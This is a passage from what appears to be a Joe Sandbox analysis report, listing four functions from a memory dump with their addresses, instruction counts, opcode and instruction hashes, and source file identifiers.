                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
                                        • Instruction ID: ab58d17d0fe92d09338d4786c1564ee7630c3b4c32da37c8895c4af7b1a5acb4
                                        • Opcode Fuzzy Hash: c1c80a8bf99777f9a2fedd5cc3e3d5a66ba5266b7e42ff36eebc591cf4d51ff6
                                        • Instruction Fuzzy Hash: 8DF0BD3091494D9FDF84EF58C499AAA7BF1FB68305F5041AAE41DD31A0DB719694CB80
                                        Function 00007FFD9BAF2428 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
                                        • Instruction ID: 630a63dfd972361e6dd9d5cbaaf61ef29bea959d8bf87355eb1aabc7dc09d830
                                        • Opcode Fuzzy Hash: 0dff646c59fe16cf3a7c2ef7284b723d3e5ca84030295b61076a434b55affdab
                                        • Instruction Fuzzy Hash: AAF0BD30A14A4D9FDF94EF58C454AEA7BF0FF58305F1041AAE41DD3260DB71A694CB80
                                        Function 00007FFD9BAFCA10 Relevance: .0, Instructions: 30COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
                                        • Instruction ID: 96884af26834d441bdaf0eff22005f158f0814284127834f2657edc9685d2275
                                        • Opcode Fuzzy Hash: 9af627059f82f3f9c41985f809b605fbb0d6c4b1c12e934007bbdc171c008f53
                                        • Instruction Fuzzy Hash: DCE06871A09B4C4FDB60EB599820AD47BA0FBC9304F04106AE00CC6290D6266944C341
                                        Function 00007FFD9BAEAD25 Relevance: .0, Instructions: 12COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000020.00000002.2091913962.00007FFD9BAEA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAEA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_32_2_7ffd9baea000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 07c30af0225afb63adc87a4d995097b46d365252ca870b0a35356bfd44ca77ae
                                        • Instruction ID: 9312bd0bcc4031ad26c6c4293a3f45537469036f2e70e6ab9b3e8b491bd3b449
                                        • Opcode Fuzzy Hash: 07c30af0225afb63adc87a4d995097b46d365252ca870b0a35356bfd44ca77ae
                                        • Instruction Fuzzy Hash: CFD01730A1960E8EDB60EB10C414BAEB271FF54304F4042A5900D97196CA386A818F81